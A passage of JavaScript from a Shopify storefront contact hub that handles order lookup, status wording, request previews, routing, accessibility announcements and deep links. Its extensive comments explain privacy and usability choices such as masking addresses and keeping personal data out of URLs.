       TRACKING_ASSIGNED one, and it is the sentence that tells the packing team
       how hard to go looking. Under two hours still reads verbatim. */
    timing: el.hoursSinceOrder < 2
      ? "immediately after placing order"
      : (el.hoursSinceOrder < 48
          ? "about " + Math.round(el.hoursSinceOrder) + " hours after placing the order"
          : "about " + Math.round(el.hoursSinceOrder / 24) + " days after placing the order"),

    /* EMPTY STRING on every OPEN request, so those messages stay byte-identical
       to the client's format. Present only when the label already exists and no
       carrier scan has been seen — the one thing the 3PL needs in order to know
       this is a pull-back off the pile rather than a routine hold. */
    interception: el.interceptOnly
      ? "\n\nNOTE: a tracking number was already assigned " +
        Math.round(el.hoursSinceTracking) + "h ago (" +
        (el.tracking.length ? el.tracking[0].number : "number unknown") +
        ") and we have seen no carrier movement — INTERCEPTION REQUEST, not a hold. " +
        "Can this still be pulled back before it goes out?"
      : ""
  }, extra || {});
}

/* Read-only preview of the Discord message that WOULD be posted. */
function discordPreview(title, body) {
  return '<section class="lc-preview">' +
           '<div class="lc-preview__h"><h2>' + esc(title) + '</h2>' +
             '<span class="lc-chip lc-chip--quiet">' + esc(CONFIG.discord.channel) + '</span>' +
             '<span class="lc-chip lc-chip--quiet">' + esc(t("preview.only")) + '</span></div>' +
           '<pre class="lc-msg">' + esc(body) + '</pre>' +
         '</section>';
}

/* Read-only preview of the Notion row, using the REAL property names. */
function notionPreview(props) {
  var rows = Object.keys(props).map(function (k) {
    var v = props[k];
    if (typeof v === "boolean") v = t(v ? "preview.notion.checked" : "preview.notion.unchecked");
    if (Array.isArray(v))       v = v.join(", ");
    return "<tr><th>" + esc(k) + "</th><td>" + esc(v) + "</td></tr>";
  }).join("");
  return '<section class="lc-preview">' +
           '<div class="lc-preview__h"><h2>' + esc(t("preview.notion.heading")) + '</h2>' +
             '<span class="lc-chip lc-chip--quiet">' + esc(CONFIG.notion.databaseName) + '</span>' +
             '<span class="lc-chip lc-chip--quiet">' + esc(t("preview.only")) + '</span></div>' +
           '<div class="lc-notion-wrap"><table class="lc-notion"><tbody>' + rows + '</tbody></table></div>' +
         '</section>';
}

/* Common Notion properties for any flow. */
function baseNotionProps(order, flow, summary, log) {
  var props = {};
  var who = orderCustomerName(order);
  props["Task"]              = CONFIG.notion.titleByFlow[flow](who);
  props["Category"]          = CONFIG.notion.categoryByFlow[flow];
  props["Progress"]          = CONFIG.notion.progressByFlow[flow];
  props["Customer Name"]     = who;
  props["Email"]             = order.email;
  props["Order Number"]      = order.name;
  props["Order Value (USD)"] = Number(order.totalPriceSet.shopMoney.amount).toFixed(2);
  props["Request Summary"]   = summary;
  props["Last Update/Log"]   = log;
  props["Product"]           = notionProducts(order);
  props["Seel Insurance"]    = hasSeel(order);
  return props;
}

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   TRACKING — HAND-OFF, NOT EMBED
   ---------------------------------------------------------------------------
   The third-party tracking embed has been removed outright. It used to inject
   either a vendor script into this page's own origin (where it could read
   State.order — full shipping address, phone, email, order total — and
   document.cookie on the storefront domain), or a raw cross-origin iframe on an
   undocumented, reverse-engineered URL contract, plus a postMessage height
   watchdog and a deep-link fallback that dumped the customer on a third-party
   site under someone else's branding.

   All of it is replaced by two things:
     1. OUR OWN sanitised status summary, rendered from data we already hold:
        order number, plain-English status, date placed and a masked
        destination (city + country only). We control this wording, which is
        the entire point of keeping a summary here at all.
     2. A link out to CONFIG.urls.trackingApp — the store's own app-proxy
        tracking page, already in the main menu, the footer menu and every
        transactional email.

   It is a LINK, never an iframe: that page renders inside the full Shopify
   theme, so embedding it would nest an entire store page (header, nav, footer,
   cookie banner) inside a card on this one.
   =========================================================================== */

/* Plain-English, carrier-free, origin-free status vocabulary. This is the only
   place an order state becomes words a customer reads. Nothing here names a
   carrier, a country, a customs step or an international hub. */
function plainStatus(order) {
  switch (evaluate(order).state) {
    case "CANCELLED":             return t("status.plain.cancelled");
    case "ON_HOLD":               return t("status.plain.onHold");
    case "DISPATCHED":            return t("status.plain.dispatched");
    /* NOT "on its way". A label has been printed and a number issued, but the
       parcel is still on the bench — saying it has gone is the over-claim that
       makes someone stop asking us and start arguing with the carrier. */
    case "TRACKING_ASSIGNED":     return t("status.plain.trackingAssigned");
    case "PARTIALLY_FULFILLED":   return t("status.plain.partiallyFulfilled");
    case "FULFILLED_NO_TRACKING": return t("status.plain.fulfilledNoTracking");
    case "OPEN":                  return t("status.plain.open");
    default:                      return t("status.plain.unknown");
  }
}

/* City + country only — never the street address. This screen can be open on a
   shared family device or an in-store tablet. */
function maskedDestination(order) {
  var a = (order && order.shippingAddress) || {};
  return [a.city, a.country].filter(function (v) {
    return v && String(v).trim();
  }).join(", ") || t("shared.destinationFallback");
}

/* The single way out to tracking, used by every state that has something to
   track. target=_blank + rel=noopener: the hub — and any half-finished request
   on it — must survive the customer going to look at their scans.

   The new tab is disclosed IN THE ACCESSIBLE NAME, not only in the sibling
   note: for this audience an unannounced new tab is a support call — the hub
   vanishes, Back does not bring it back, and the assumption is that the site
   is broken. The visible note says it too. */
function trackButton(opts) {
  opts = opts || {};
  return '<a class="lc-btn' + (opts.ghost ? " lc-btn--ghost" : "") + '" href="' +
    esc(CONFIG.urls.trackingApp) + '" target="_blank" rel="noopener">' +
    esc(opts.label || t("shared.btn.track")) +
    '<span class="sr-only">' + esc(t("shared.newTab")) + '</span></a>';
}

/* THE HAND-OFF TO SEEL. Same shape as trackButton(), for the same reasons: an
   <a> that looks like a button because it LEAVES THE SITE and must behave like
   a link, a new tab so the hub and any half-finished claim survive it, and the
   new tab disclosed in the accessible name rather than sprung on someone. It
   is never a `data-goto` button — there is no view on the other side of it. */
function seelButton(opts) {
  opts = opts || {};
  return '<a class="lc-btn' + (opts.ghost ? " lc-btn--ghost" : "") + '" href="' +
    esc(CONFIG.urls.seelResolve) + '" target="_blank" rel="noopener">' +
    esc(opts.label || t("returns.seel.btnClaim")) +
    '<span class="sr-only">' + esc(t("shared.newTab")) + '</span></a>';
}

/* Sits under the button. Explains what it does without naming a carrier, a
   country, or a third party the customer could go and argue with instead. */
function trackHandoffNote() {
  return '<p class="lc-track-note">' + t("shared.trackNote") + '</p>';
}

/* Our own status summary. Everything on it is either already on the customer's
   confirmation email or is a number they need — nothing is inferred, nothing
   is invented, and nothing describes where the parcel has been. */
function trackSummaryCard(order, tracking, index, total) {
  var many = total > 1;
  return '<section class="lc-card">' +
    /* No status chip in this header: the <dl> below carries the status as a
       labelled row, and a chip repeating the same three words 40px away reads
       as two different pieces of information rather than one. */
    /* 1.1rem was 17.6px against the root; the em below is 17.6px against
       --lc-base, and it picks up the merchant's heading scale like every other
       heading. Same everywhere an inline font-size appears in this file. */
    '<h2 style="font-size:calc(1.03529412em * var(--lc-heading-scale));margin-bottom:14px">' +
      esc(many ? t("status.parcel.headingMany", { index: index + 1, total: total })
               : t("status.parcel.heading")) + '</h2>' +
    '<dl class="lc-kv">' +
      '<dt>' + esc(t("status.parcel.label.order")) + '</dt><dd>' + esc(order.name) + '</dd>' +
      '<dt>' + esc(t("status.parcel.label.status")) + '</dt><dd>' + esc(plainStatus(order)) + '</dd>' +
      '<dt>' + esc(t("status.parcel.label.placed")) + '</dt><dd>' + esc(fmtDate(order.createdAt)) + '</dd>' +
      '<dt>' + esc(t("status.parcel.label.headingTo")) + '</dt><dd>' + esc(maskedDestination(order)) + '</dd>' +
      '<dt>' + esc(t("status.parcel.label.tracking")) + '</dt><dd><strong>' + esc(tracking.number) + '</strong></dd>' +
    '</dl>' +
    '<div class="lc-btn-row">' + trackButton() + '</div>' +
    trackHandoffNote() +
  '</section>';
}

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   STATE + ROUTER
   ---------------------------------------------------------------------------
   A real stack, so every Back button works and there are no dead ends.
   =========================================================================== */
var State = {
  flow: null,          // order-status | address-change | cancel-order | amend-order | refund-return
  order: null,         // the looked-up order
  lookup: { orderNumber:"", email:"", name:"" },
  address: null,       // draft new address
  amend: null,         // draft amendment
  /* Draft spelling change: { item, current, next }. `item` is the LINE ITEM
     object itself (identity-compared, exactly as State.amend.item is), so a
     draft cannot survive a switch to a different order. */
  spelling: null,
  /* Draft return: { reason, severity, detail, lineItemId, evidence:[…] }.
     `evidence` holds the handles the upload endpoint minted — { key, shot,
     kind, name } — never the File objects themselves, which are released the
     moment the upload resolves so a customer photographing five things does
     not carry 50MB of image data around in a tab. */
  returns: null,
  /* THE EVIDENCE TICKET, from the lookup response. Short-lived, signed by the
     Worker, bound to this one order, and useless for anything except
     uploading a photo against it. It is NOT an access token and grants no
     read of anything — see the header of uploadEvidence(). Wiped with the
     rest of the session below, because it names an order. */
  evidenceTicket: null,
  result: null,        // { discord, notion, requestId }
  /* Which flows have already been submitted for the CURRENT order, so a
     customer who returns via "See my order status" cannot fire a second
     identical stop request at the 3PL and a second Notion row. Keyed by flow. */
  submitted: {},
  /* CONSECUTIVE failed lookups in this session. The failure message offers an
     email address only from LOOKUP_FAILURES_BEFORE_EMAIL onwards — see
     VIEWS.lookup. Reset by a successful lookup and by clearOrderSession(), so
     it counts a run of failures, not a lifetime total. */
  lookupFailures: 0,
  /* Bumped by every lookup submit AND by clearOrderSession(). An in-flight
     lookup compares the token it captured against this before it is allowed to
     touch State.order — see VIEWS.lookup. Without it, pressing Back during the
     ~900ms lookup threw (FLOWS[null].next) and, far worse, re-populated
     State.order AFTER the privacy wipe had run, leaving a stranger's full
     order loaded behind the hub on a shared device. */
  _lookupToken: 0
};

/* This is a public storefront page — library terminals, in-store tablets,
   shared family devices. Everything derived from a lookup is wiped together
   so a half-finished session cannot hand the next person a full order view. */
function clearOrderSession() {
  State.order = null;
  State.lookup = { orderNumber:"", email:"", name:"" };
  State.address = null;
  State.amend = null;
  State.spelling = null;
  State.returns = null;
  State.evidenceTicket = null;
  State.result = null;
  State.submitted = {};
  /* The next person on a shared device starts from zero attempts, and so does
     the same person starting again with a different order. */
  State.lookupFailures = 0;
  /* Invalidate any lookup still in flight. A promise that resolves after this
     ran must NOT put the order back. */
  State._lookupToken++;
}

/* HOW MANY CONSECUTIVE FAILED LOOKUPS BEFORE WE OFFER AN EMAIL ADDRESS.
   Almost every failed lookup is a typo, the wrong inbox, or an order number
   from a different shop — all of which the re-check guidance fixes in seconds.
   Printing an address on the first failure hands people a way out of the tool
   at the exact moment they are one correction away from succeeding, and it puts
   an address on a screen that anyone can reach without proving anything, which
   works against the same anti-enumeration reasoning as the single generic
   failure message. Three consecutive misses is a different situation: at that
   point the customer has tried and it genuinely is not working, and a person
   is the right answer. */
var LOOKUP_FAILURES_BEFORE_EMAIL = 3;

var IDLE_MS = 10 * 60 * 1000;
var _idleTimer = null;
function touchIdleTimer() {
  if (_idleTimer) clearTimeout(_idleTimer);
  if (!State.order) return;
  _idleTimer = setTimeout(function () {
    if (!State.order) return;
    /* NEVER WHILE A SUBMIT IS OUTSTANDING. Firing here cleared State.order, and
       the handlers' `State.order !== order` guard then silently discarded a
       CONFIRMED ok:true — the packing team told, the customer shown "we closed
       your order for privacy", State.submitted emptied, and nothing on screen
       saying the request had landed. Re-arm instead; a request in flight is
       activity, and it is bounded by SUBMIT_TIMEOUT_MS. */
    if (submitInFlight()) { touchIdleTimer(); return; }
    clearOrderSession();
    Router.reset();
    say(t("shared.say.idleTimeout"));
  }, IDLE_MS);
}

var Router = {
  stack: [],
  timers: [],
  cleanups: [],
  _popping: false,

  clearTimers: function () {
    this.timers.forEach(clearInterval);
    this.timers = [];
    this.cleanups.forEach(function (fn) { try { fn(); } catch (e) {} });
    this.cleanups = [];
  },

  /* --- browser history ---------------------------------------------------
     Routing used to be purely in-memory, so the browser/phone Back button —
     the primary navigation instrument for this audience — exited the hub
     entirely and binned a half-typed address. Each view is now a real history
     entry. pushState is wrapped because a file:// origin can reject it. */
  _pushHistory: function (name, replace) {
    var st = { lcDepth: this.stack.length, lcName: name };
    try {
      if (replace || this.stack.length <= 1) history.replaceState(st, "", "#" + name);
      else history.pushState(st, "", "#" + name);
    } catch (e) {
      try { replace ? history.replaceState(st, "") : history.pushState(st, ""); } catch (e2) {}
    }
  },

  go: function (name, opts) {
    opts = opts || {};
    if (!opts.replace) this.stack.push({ name:name, params:opts.params || {} });
    else this.stack[this.stack.length - 1] = { name:name, params:opts.params || {} };
    if (!opts.fromPop) this._pushHistory(name, !!opts.replace);
    this.render(opts.fade);
  },

  back: function () {
    /* Let the browser drive when we own a history entry, so the in-page "Back"
       link and the hardware Back button can never disagree about depth. */
    if (this.stack.length > 1) {
      this._popping = true;
      try { history.back(); return; } catch (e) { this._popping = false; }
      this.popTo(this.stack.length - 1);
    }
  },

  /* Pop one entry and render. Also the popstate handler's entry point. */
  popTo: function (depth) {
    while (this.stack.length > depth && this.stack.length > 1) this.stack.pop();
    /* Returning to the hub ends the session: back out of a flow and the next
       person on this device must not inherit the order. */
    if (this.stack.length === 1 && this.current().name === "hub") {
      State.flow = null;
      clearOrderSession();
    }
    this.render(false);
  },

  reset: function () {
    this.stack = [];
    State.flow = null;
    clearOrderSession();
    this.go("hub");
  },

  current: function () { return this.stack[this.stack.length - 1]; },

  render: function (fade) {
    var self = this;
    var host = $("#lc-view");
    var doRender = function () {
      self.clearTimers();
      var cur = self.current();
      try {
        var view = VIEWS[cur.name];
        if (!view) throw new Error("Unknown view: " + cur.name);
        host.innerHTML = view.render(cur.params);
        if (view.mount) view.mount(cur.params);
      } catch (err) {
        /* An uncaught throw in here used to leave #lc-view untouched: the
           customer saw the previous screen, clicked the button again, and
           nothing ever happened. Never leave a dead page. */
        if (window.console && console.error) console.error("[contact-hub]", err);
        host.innerHTML = errorCard();
      }
      /* Announce the step and move focus to its heading — BUT NOT ON THE FIRST
         RENDER.

         Moving focus after a navigation is what tells a screen-reader user the
         screen changed; without it they are left at the top of the document
         with no idea anything happened. On the FIRST render there has been no
         navigation: the customer has just arrived, the heading is already the
         first thing in the reading order, and there is nothing to announce.

         Focusing it anyway had a visible cost. `h.focus()` on a tabindex="-1"
         heading makes Chrome match :focus-visible, so the hub's focus ring
         painted a heavy dark box around "How can we help you today?" on every
         page load and refresh, clearing only once the customer clicked
         somewhere else. It read as a rendering fault on the first thing anyone
         sees.

         So: skip focus and the announcement for everything the BOOT paints,
         keep both for every navigation after it — which is the only place they
         were ever doing any work. */
      var h = host.querySelector("[data-view-title]");
      if (h && !self._firstRenderDone) {
        /* Still make it programmatically focusable, so the FIRST navigation
           away and back can focus it without re-deciding this. */
        h.setAttribute("tabindex", "-1");
      } else if (h) {
        h.setAttribute("tabindex", "-1");
        h.focus({ preventScroll:true });
        announceStep(h.textContent);
      }
      /* THE FLAG IS SET BY THE BOOT SEQUENCE, NOT HERE. See the end of lcBoot().

         Setting it here made the exemption mean "the first call to render()",
         when what it has to mean is "everything that paints before the customer
         has touched anything". A deep link spends the boot on TWO renders, not
         one: the hub paints first, then lcApplyDeepLink() calls startFlow() ->
         Router.go(), and that second render took the else branch. Opening
         ?lc=address-change therefore focused the h1 of a screen nobody had
         navigated to and announced "Change shipping address. Step 2." to a
         screen reader on arrival, about a step 1 the customer never saw — the
         identical symptom, on a different heading, to the hub focus box this
         guard was added to remove. */
      window.scrollTo({ top:0, behavior: reducedMotion() ? "auto" : "smooth" });
      host.classList.remove("lc-fading");
      touchIdleTimer();
    };

    if (fade && !reducedMotion()) {
      host.classList.add("lc-fading");
      setTimeout(doRender, 280);
    } else {
      doRender();
    }
  }
};

/* Assigning the SAME string to a live region is not a mutation, so it is not
   announced. Two consecutive views share a heading in at least three reachable
   places (lookup -> addressGate -> addressForm are all "Change shipping
   address"), which made those steps silent. Clear, then set on a later tick,
   and include the step number so identical headings still differ. */
var _liveTimer = null;

/* Every write to the live region goes through say(), so an announcement made
   while a step announcement is still pending cancels it rather than being
   silently overwritten 60ms later. Without this, a fast-failing lookup wrote
   "We could not find an order" and the step title then clobbered it — leaving
   a screen-reader user with no idea the search had failed. */
function say(msg) {
  if (_liveTimer) { clearTimeout(_liveTimer); _liveTimer = null; }
  var live = $("#lc-live");
  if (live) live.textContent = msg;
}

function announceStep(text) {
  var live = $("#lc-live");
  if (!live) return;
  if (_liveTimer) clearTimeout(_liveTimer);
  live.textContent = "";
  _liveTimer = setTimeout(function () {
    _liveTimer = null;
    live.textContent = t("shared.stepAnnounce", {
      title: String(text || "").trim(), step: Router.stack.length
    });
  }, 60);
}

function errorCard() {
  return '<h1 data-view-title>' + esc(t("shared.error.heading")) + '</h1>' +
    '<section class="lc-card lc-card--warn">' +
      '<p>' + t("shared.error.body") + '</p>' +
      '<p>' + t("shared.error.emailLine", { email: esc(CONFIG.store.supportEmail) }) + '</p>' +
      '<div class="lc-btn-row">' +
        '<button type="button" class="lc-btn" data-home>' + esc(t("shared.btn.backToHub")) + '</button>' +
      '</div>' +
    '</section>';
}

/* Which flows need an order looked up first, and where they go afterwards. */
/* `labelKey` rather than a literal label: the title is resolved through t() at
   RENDER time, so a merchant editing it in the theme editor sees the change on
   the next re-render rather than on the next full page load. */
var FLOWS = {
  "order-status":   { needsOrder:true,  next:"status",       labelKey:"flow.orderStatus.label" },
  "address-change": { needsOrder:true,  next:"addressGate",  labelKey:"flow.addressChange.label" },
  "cancel-order":   { needsOrder:true,  next:"cancelGate",   labelKey:"flow.cancelOrder.label" },
  "amend-order":    { needsOrder:true,  next:"amendGate",    labelKey:"flow.amendOrder.label" },
  /* `requires` is checked by startFlow(), so the flow is unreachable — from the
     hub card, from a FAQ action target, from a status-screen shortcut, and from
     a pasted `?lc=fix-spelling` deep link or either of its fragment forms —
     whenever the store has switched personalisation off. The hub card being
     filtered out of the grid is the visible half of that; this is the half that
     cannot be routed around.

     THAT LAST CLAUSE USED TO BE FALSE. It named "a pasted #fix-spelling URL
     fragment" among the entry points `requires` closed off, and for several
     rounds nothing in this file read location.hash at all: the fragment was not
     being blocked, it did nothing whatsoever, and the comment was describing a
     lock on a door that had never been cut. The door exists now — see the DEEP
     LINKS block below startFlow() — it opens through startFlow() like every
     other entry point, and the sentence is finally true. */
  "fix-spelling":   { needsOrder:true,  next:"spellingGate", labelKey:"flow.fixSpelling.label",
                      requires:"personalisation" },
  /* NEEDS AN ORDER NOW, WHERE IT USED TO NEED NONE. The screen this replaces
     was an explainer that anybody could read; this is a real claim, and every
     question on it — is it in the window, has it even arrived, is it
     personalised, which item — is unanswerable without one. The evidence
     ticket that authorises a photo upload is also minted by the lookup and by
     nothing else.

     WHAT THAT COSTS: the FAQ answers whose action targets this flow now land
     on the lookup screen rather than on a page of prose. That is the right
     trade — those answers already carry the explanation in their own body
     copy, and the policy in three lines is repeated at the top of
     returnsStart. Nobody loses the information; they gain a flow that can
     actually do something. */
  "refund-return":  { needsOrder:true,  next:"returnsStart", labelKey:"flow.refundReturn.label" },
  "something-else": { needsOrder:false, next:"hub",          labelKey:"flow.somethingElse.label" }
};

function startFlow(flow) {
  var def = FLOWS[flow];
  if (!def) return;

  /* A flow whose `requires` is not satisfied does not exist as far as the
     router is concerned. Same rule as hubCardVisible(), enforced at the one
     place every entry point funnels through. */
  if (def.requires === "personalisation" && !personalisationEnabled()) return;

  /* "Something else" has nowhere to go — its own description points at the
     search box on the page the customer is already looking at. Navigating to
     "hub" pushed a second identical hub entry, wiped any typed query and ate
     one Back press. Focus the search box instead. */
  if (flow === "something-else") {
    State.flow = null;
    var openSomethingElse = function () {
      var q = $("#faq-q");
      if (!q) {
        /* THE SEARCH BOX IS SWITCHED OFF ("Show the FAQ search box"). Without
           this branch the tile was a dead button: no box to focus, nothing
           rendered, no feedback. If the human control is still on, go straight
           to it — that is the whole of what the card can still offer. If it is
           off too, hubCardVisible() has already removed the tile, so we only
           reach here from a FAQ entry's own action target; do nothing rather
           than navigate somewhere the customer did not ask for. */
        if (shown("faqHuman")) showLastResortAnswer();
        return;
      }
      q.focus();
      q.scrollIntoView({ behavior: reducedMotion() ? "auto" : "smooth", block:"center" });
      /* The card's caption promises "or reach a real person", and focusing an
         empty text field does not deliver that half of it — so render the human
         route underneath as well. Only when the box is empty: a customer who
         has already typed a query must not have their results replaced. And
         only while that control is switched on, or the toggle would be porous —
         off in the card, still firing from the tile. */
      if (!q.value.trim() && shown("faqHuman")) showLastResortAnswer({ focus:false });
    };
    if (Router.current() && Router.current().name === "hub") openSomethingElse();
    else { Router.go("hub"); setTimeout(openSomethingElse, 60); }
    return;
  }

  State.flow = flow;
  if (!def.needsOrder) { Router.go(def.next); return; }
  /* Already authenticated this session? Skip straight to the flow. */
  if (State.order) { Router.go(def.next); return; }
  Router.go("lookup");
}

/* The lastResort FAQ entry ("I still need help from a person") as a real,
   clickable destination rather than something only a failed search can reach.
   Used by the persistent hub button and by startFlow("something-else"). */
function lcLastResortEntry() {
  var list = CONFIG.faq.filter(function (e) { return e.lastResort; });
  return list.length ? list[0] : null;
}

function showLastResortAnswer(opts) {
  opts = opts || {};
  var entry = lcLastResortEntry(), out = $("#faq-results");
  if (!entry || !out) return;
  out.innerHTML = lcRenderAnswer(entry);
  var count = $("#faq-count");
  if (count) count.textContent = t("faq.showingHuman");
  var art = out.querySelector(".lc-answer");
  if (art && opts.focus !== false) {
    /* tabindex="-1" so focus can land on it without adding a tab stop. */
    art.setAttribute("tabindex", "-1");
    art.focus();
    art.scrollIntoView({ behavior: reducedMotion() ? "auto" : "smooth", block:"center" });
  }
}

/* ===========================================================================
   DEEP LINKS — ?lc=<flow-id>, ?lc=faq&q=<faq-id>, and the #-fragment forms.

   An order-confirmation email's button has to land where the button promised,
   so the hub accepts exactly two destinations from the URL and nothing else:

     ?lc=fix-spelling             open that flow
     ?lc=faq&q=fold-pool-tent     open the hub with that answer showing
     #lc=fix-spelling             the same, as a fragment
     #lc=faq&q=fold-pool-tent     the same, as a fragment
     #fix-spelling                the bare fragment the FLOWS comment above has
                                  been advertising since before it existed

   THE RULES HERE MATTER MORE THAN THE FEATURE:

   * NO PII IN A URL, EVER. A flow id or a FAQ id is the whole vocabulary.
     Nothing in here reads an order number, an email address or a name out of
     the URL, and nothing writes to it — a link forwarded to a friend, pasted
     into a support ticket, or logged by a mail provider's click tracker must
     not be able to carry someone's order with it. Every parameter that is not
     `lc` or `q` is ignored where it stands.
   * VALIDATED, THEN SILENT. An id that is not a key of FLOWS or an id in
     CONFIG.faq lands the customer on the hub: no error screen, no blank page,
     no console noise. A typo in an email template, a campaign link older than
     a rename, a URL truncated by a mail client — all of them degrade to "the
     customer is looking at the hub", which is a page that works.
   * `requires` IS NOT NEGOTIABLE. Routing goes through startFlow(), the same
     funnel the hub cards and the FAQ action buttons use, so ?lc=fix-spelling
     is inert while the store has personalisation switched off. A URL is not a
     way around a flow that does not exist.
   * THE ORDER LOOKUP IS NEVER SKIPPED. Also startFlow(): a needsOrder flow
     opens at its lookup step, exactly as clicking the card does. A deep link
     is a shortcut through the menu, never through the identity check.
   * THE PARAMS ARE STRIPPED before the hub paints, so a refresh cannot re-fire
     the route, a shared link is just a link to the hub, and the address bar
     stays clean. Only `lc` and `q` are removed: anything else in the query
     string belongs to the theme, an app or a campaign (`preview_theme_id`,
     `utm_*`), and deleting a Shopify preview parameter to tidy up after
     ourselves would break the page we were tidying.
   * THE FIRST RENDER STILL DOES NOT STEAL FOCUS. See lcOpenFaqDeepLink().

   ON LOAD ONLY, and that is the right scope. Routing happens once, in lcBoot(),
   because every way a customer reaches one of these links — a button in an
   order-confirmation email, a link in a reply from support — opens a fresh
   document. Editing the fragment in the address bar of a hub that is already
   open changes nothing, which is also what stops the router's own `#lookup` /
   `#spellingGate` writes from being mistaken for routes.

   Ids are matched case-insensitively (every key in FLOWS and every id in
   CONFIG.faq is lower case), so a link retyped by hand out of a printed email
   still lands. Nothing else about the value is normalised: it either is an id
   we ship or it is not.
   =========================================================================== */

function lcHasOwn(obj, key) {
  return Object.prototype.hasOwnProperty.call(obj, key);
}

/* Query-string parsing without URLSearchParams, which this file's browser floor
   predates, and without `new URL()`, which throws on a file:// prototype in
   older engines. Accepts the body of either a search or a hash. First value for
   a repeated key wins, and own-property checks keep `?constructor=...` from
   resolving to something off Object.prototype. */
function lcReadParams(str) {
  var out = {};
  String(str == null ? "" : str).replace(/^[?#]/, "").split("&").forEach(function (pair) {
    if (!pair) return;
    var i = pair.indexOf("=");
    var k = i < 0 ? pair : pair.slice(0, i);
    var v = i < 0 ? "" : pair.slice(i + 1);
    try { k = decodeURIComponent(k.replace(/\+/g, " ")); } catch (e) {}
    try { v = decodeURIComponent(v.replace(/\+/g, " ")); } catch (e) {}
    if (k && !lcHasOwn(out, k)) out[k] = v;
  });
  return out;
}

/* Remove `lc` and `q` from the address bar and drop the fragment, preserving
   any other query the theme or an app put there. history.state is passed back
   unchanged so the router's own depth bookkeeping survives.

   replaceState with a URL argument throws on a file:// origin — the standalone
   prototype's own case — which is why this is wrapped exactly as
   Router._pushHistory() is. Failing to tidy the URL is cosmetic; throwing here
   would take the boot sequence down with it. */
function lcParamKey(pair) {
  var k = String(pair).split("=")[0];
  try { k = decodeURIComponent(k.replace(/\+/g, " ")); } catch (e) {}
  return k;
}

/* Does this query string carry either of our keys, decoded? */
function lcHasDeepLinkParam(search) {
  return String(search || "").replace(/^\?/, "").split("&").some(function (p) {
    if (!p) return false;
    var k = lcParamKey(p);
    return k === "lc" || k === "q";
  });
}

function lcStripDeepLink() {
  var loc = window.location || {};
  var search = String(loc.search || "");
  if (search) {
    /* THE KEY IS COMPARED DECODED, because lcReadParams() reads it decoded and
       the two must not disagree about what a key is. Matching the raw text let
       `?%6Cc=fix-spelling` route — lcReadParams() resolves `%6Cc` to `lc` — and
       then survive the strip, so the param stayed in the address bar and the
       route re-fired on every refresh, every Back-then-Forward and every open
       of a bookmarked or forwarded copy, forever. The LC_DEEP_LINK_TAKEN latch
       is no help: it is per-document, and a refresh is a new document. This is
       reachable without malice — ESP click-trackers and URL rewriters re-encode
       query strings as a matter of routine. */
    var kept = search.replace(/^\?/, "").split("&").filter(function (p) {
      if (!p) return false;
      var k = lcParamKey(p);
      return k !== "lc" && k !== "q";
    });
    search = kept.length ? "?" + kept.join("&") : "";
  }
  try { history.replaceState(history.state, "", String(loc.pathname || "") + search); }
  catch (e) {}
}

/* ONCE PER PAGE, DELIBERATELY. The theme editor re-fires shopify:section:load —
   and therefore lcBoot() — on every keystroke a merchant types into a setting.
   Without this latch, a merchant who happened to open the editor on a deep-link
   URL would be thrown back into the deep-linked flow on every character, and
   the strip above cannot be relied on to prevent it because it is allowed to
   fail silently on origins that reject replaceState. */
var LC_DEEP_LINK_TAKEN = false;

/* Reads the route out of the URL and removes it in the same breath. Returns
   {lc, q} or null; validating the values is lcApplyDeepLink()'s job, because
   an unrecognised `lc` still has to be stripped. */
function lcTakeDeepLink() {
  if (LC_DEEP_LINK_TAKEN) return null;
  LC_DEEP_LINK_TAKEN = true;

  var loc = window.location || {};
  var hash = String(loc.hash || "").replace(/^#/, "");
  var qs = lcReadParams(loc.search);
  var hs = lcReadParams(hash);
  var raw = null;

  if (qs.lc) raw = { lc: qs.lc, q: qs.q };
  else if (hs.lc) raw = { lc: hs.lc, q: hs.q };
  else if (hash && hash.indexOf("=") < 0 && lcHasOwn(FLOWS, hash.toLowerCase())) {
    /* THE BARE `#fix-spelling` FORM, restricted to keys of FLOWS on purpose.
       Router._pushHistory() writes the CURRENT VIEW NAME into the hash on every
       navigation, so a customer who refreshes halfway through a flow arrives
       here with `#spellingGate` or `#lookup` in the bar — a fragment that is
       emphatically not a route and must not be treated as one. The two
       vocabularies cannot collide: view names are camelCase single words, flow
       ids are hyphenated. */
    raw = { lc: hash };
  }

  /* Tidy whenever the query CONTAINS one of our keys, not only when a route was
     actually taken. An inert `?lc=` — empty value, no fragment — routed nowhere
     and then sat in the address bar for the rest of the session, against the
     same "the address bar stays clean" promise. */
  if (raw || lcHasDeepLinkParam(loc.search)) lcStripDeepLink();
  return raw;
}

/* Find a FAQ entry by id. Linear over ~19 entries, once, at boot. Raw: it
   answers "does this id name an entry", not "may that entry be shown". The
   second question is lcFaqEntryVisible()'s, and every caller has to ask both. */
function lcFaqEntryById(id) {
  if (!id) return null;
  var list = CONFIG.faq || [];
  for (var i = 0; i < list.length; i++) {
    if (list[i] && list[i].id === id) return list[i];
  }
  return null;
}

/* THE ONE PREDICATE for "does this FAQ entry exist as far as a customer is
   concerned", shared by lcBuildIndex() and lcOpenFaqDeepLink() so the search
   index and the URL can never disagree about which answers there are.

   It used to live only inside the index filter, and the deep link walked
   straight past it. With personalisation switched off the hub correctly dropped
   the "name is spelt wrong" card and de-indexed its answer — and
   ?lc=faq&q=fix-spelling put the answer back anyway, complete with its "Fix my
   spelling" action button, which startFlow() then refused to act on because the
   flow is gated too. The URL produced a state the UI cannot: an advertised door
   plus a button that does nothing at all. An unreachable answer is better than
   a visibly broken one.

   Add any future `requires:` value HERE and both readers inherit it. */
function lcFaqEntryVisible(e) {
  if (!e) return false;
  if (e.requires === "personalisation") return personalisationEnabled();
  return true;
}

/* Router.render() finishes with a smooth window.scrollTo(0). Scrolling in the
   same tick puts two smooth scrolls in flight at once and the page settles
   wherever the browser resolves the race — usually back at the top, which is
   the one place a deep-linked answer must not be. A tick later the reset has
   already been issued and this is unambiguously the last word.
   `behavior` honours prefers-reduced-motion, like every other scroll here. */
function lcDeepScrollTo(node) {
  if (!node) return;
  setTimeout(function () {
    try {
      node.scrollIntoView({ behavior: reducedMotion() ? "auto" : "smooth", block:"center" });
    } catch (e) { try { node.scrollIntoView(); } catch (e2) {} }
  }, 60);
}

/* ?lc=faq&q=<id> — render one answer into the hub's results region and scroll
   to it. The hub itself is already on screen; this adds to it rather than
   navigating, which is what "opens the hub with that answer expanded" means. */
function lcOpenFaqDeepLink(id) {
  var entry = lcFaqEntryById(id);
  if (!entry) return;                        // unknown id -> the plain hub

